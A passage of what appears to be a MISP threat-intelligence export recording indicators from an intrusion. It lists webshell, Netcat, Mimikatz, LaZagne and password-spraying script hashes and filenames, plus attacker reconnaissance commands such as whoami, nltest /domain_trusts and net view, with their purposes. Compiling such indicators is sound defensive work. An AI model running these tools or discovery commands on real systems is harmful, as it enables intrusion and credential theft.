2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "5bd20e73-ae9a-41a8-b978-cf12639a317c" ,
"value" : "sec4ever.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "basic ASPX webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962532" ,
"uuid" : "c0ec7d82-7d12-42dc-aeca-0a21eabe33c9" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "3065a661-1d7d-424d-a649-6f9cd728eb75" ,
"value" : "0152de452f92423829e041af2d783e3f" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "436c69a0-60e9-44fd-ab16-641639b82f0a" ,
"value" : "editor.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "devilzshell webshell\r\n" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962532" ,
"uuid" : "1045be6d-0c9d-4997-a98d-47f5d32951e0" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "7dee830a-3a81-46ba-a447-82149b25bac4" ,
"value" : "7981f1bf9b8e5f4691e4ac440f1ba251" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "091ee23c-31bf-431f-b4f9-ed0f6833d9f3" ,
"value" : "devilzshell.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "Nightrunner webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962532" ,
"uuid" : "78aeb5df-c2ab-48b7-86f9-9c9c7b19e2eb" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "5f7732cf-d5b1-4eab-b95d-9e50486b7eb3" ,
"value" : "4b646e7958e1bb00924b8e6598fe6670" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "826530ff-7843-4e17-9f27-cac575549d97" ,
"value" : "nightrunner.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "PHP webshell\r\n" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962532" ,
"uuid" : "85e8cf0d-dafa-40cc-a12c-888b92dd5b85" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "914eb7d5-336f-432c-9056-08bc943b8968" ,
"value" : "d608163a972f43cc9f53705ed6d31089" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "99051cad-46d0-447b-8c5a-4e491d03c468" ,
"value" : "mini.php" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "Netcat" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664964197" ,
"uuid" : "053265c5-7ab7-40e2-a284-9cb688db0db7" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664964197" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "1394e93f-2d1d-4faa-a4c2-d9b3ddbb4824" ,
"value" : "7567f938ee1074cd3932fdb01088ca35" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Netcat\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664964197" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "7ed4280a-247d-4201-9dc0-4b5bbeb9f78b" ,
"value" : "50.exe" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Netcat\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664964197" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "07c6b71a-2d8e-495f-8567-811cb87abdec" ,
"value" : "04.exe" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Netcat\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664964197" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "beaae563-273e-4c4a-b7c3-1beae438ffdc" ,
"value" : "putty.exe" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Netcat\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "Mimikatz" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664964291" ,
"uuid" : "b56e1f1f-c63e-44f3-beed-7efc71b29f0a" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664964291" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "9c9351e0-4443-4a61-be2e-9423ef62d0b4" ,
"value" : "566b4858b29cfa48cd5584bebfc7546b" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:malpedia=\"MimiKatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#064800" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Mimikatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664964291" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "d7726f3c-e32f-462e-b7e0-0d76c25633b4" ,
"value" : "mim.ps1" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:malpedia=\"MimiKatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#064800" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Mimikatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664965118" ,
"uuid" : "6e306200-9536-48d8-ba02-fb7bc6210e93" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664965118" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "208897ae-eb47-4f55-ae1f-28c3ef024e89" ,
"value" : "bd876b57f8be84ff5d95c899de34c0ee"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664965118" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "c0fc37e0-2bcf-42cd-b4b7-3d9743fcbef4" ,
"value" : "Invoke-DCSync.ps1.txt"
}
]
} ,
{
"comment" : "Mimikatz" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664965260" ,
"uuid" : "0c4e1b7d-9d9a-4fbd-979b-20b4e2a9656d" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664965260" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "e16a9f57-bccf-4e26-be0e-4dce99ee101e" ,
"value" : "f575d4bb1f5ff6c54b2de99e9bc40c75" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:malpedia=\"MimiKatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#064800" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Mimikatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664965260" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "995e3944-eb79-4174-8a93-4880f683d259" ,
"value" : "Aaa.txt" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:malpedia=\"MimiKatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#064800" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Mimikatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664965260" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "9c8337ed-e229-4aa4-a39b-0bdcd5a221e7" ,
"value" : "Aaa.ps1" ,
"Tag" : [
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:malpedia=\"MimiKatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#064800" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Mimikatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664965335" ,
"uuid" : "f3aa997e-9b85-4bea-b0ea-a3c25bfdf334" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664965335" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "29f5d293-f7bc-4523-89f7-8129683c1fd4" ,
"value" : "238a4efe51a9340511788d2752aca8d6"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664965335" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "ce918ba4-2634-4060-9286-264845e21aeb" ,
"value" : "DomainPasswordSpray.ps1"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664965359" ,
"uuid" : "94382d57-bf2b-4230-a0b4-5a4a13d61322" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664965359" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "fc546caa-02ea-446a-af15-ff2e92b553a3" ,
"value" : "550bd7c330795a766c9dfb1586f3cc53"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664965359" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "1ca63786-8ea4-4978-816e-c783264bcb56" ,
"value" : "Copy-VSS.ps1"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664965379" ,
"uuid" : "3290ec45-3315-4cd8-a44a-7b193b3c0e73" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664965379" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "01c7176d-b7c1-4c55-bc2b-04f98f1c9a54" ,
"value" : "68d3bf2c363144ec6874ab360fdda00a"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664965379" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "8e8b098d-7829-4367-a149-19bbb82a3cdb" ,
"value" : "lazagne.exe"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664965458" ,
"uuid" : "e6d4afb9-8f17-4616-bf11-e2811c4027e4" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664965458" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "09d06eae-375a-4e4b-adfd-64dbfd7a1195" ,
"value" : "3437e3e59fda82cdb09eab711ba7389d"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664965458" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "9eb26e2a-9195-4d9a-a013-62dad6ec8cc0" ,
"value" : "mimilove.exe"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664971638" ,
"uuid" : "e77a5eb2-08b5-4318-a5f2-919b36810acf" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664971638" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "277d50cc-e850-4b63-b260-400c9b283b9d" ,
"value" : "cmd.ex\u0435 /c who\u0430mi"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664971638" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "6dfee739-7b80-4f22-85d3-6de460b81f36" ,
"value" : "Identify user privileges"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664972734" ,
"uuid" : "c0f056c7-8f46-459a-be27-b44adc75712f" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664972734" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "07efa145-5d14-40a1-9c0e-29fb14690d39" ,
"value" : "cmd.ex\u0435 /c \u0430ppcmd list site"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664972734" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "cb6066d2-c039-45b3-b1d2-dbdccfe5bea1" ,
"value" : "List the hosted websites on the web server"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664972794" ,
"uuid" : "335630e4-b15a-4580-ba4b-397949f9a27a" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664972794" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "f7f1f08d-1522-4969-bbaa-b7489ee98ee7" ,
"value" : "cmd.ex\u0435 /c nlt\u0435st /domain_trusts"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664972794" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "57bc304a-ea81-4622-bd5a-86e899e80891" ,
"value" : "List domain controllers and enumerate domain trusts"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664972875" ,
"uuid" : "a2155916-623b-49d9-95f3-0efa3b8c30b7" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664972875" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5910a1d8-6777-4fad-9b92-7fddb36eac52" ,
"value" : "cmd.ex\u0435 /\u0441 dir"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664972875" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "bc3f3f48-f44e-419f-8931-ca483dc52321" ,
"value" : "List current directories and files"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664972899" ,
"uuid" : "115e07f7-3a2b-454a-9739-d258ea48c461" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664972899" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "60aeca64-d8c6-495d-a52f-56e59ef9933c" ,
"value" : "cmd.ex\u0435 /c n\u0435t view"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664972899" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "462fe85e-02f8-4308-b071-2bf0c4e49a85" ,
"value" : "Display a list of domains, computers, or resources that are being shared by the specified computer"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1664972997" ,
"uuid" : "74aba723-d4a6-4ac1-aeef-1ecc3bce0e59" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1664972997" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "b4ff81a8-6765-441c-af30-204fc717e001" ,
"value" : "cmd.ex\u0435 /c s\u0435t"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1664972997" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "af5b5b03-4f95-4d50-8237-0d78117805c3" ,
"value" : "Display the current environment variable settings"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
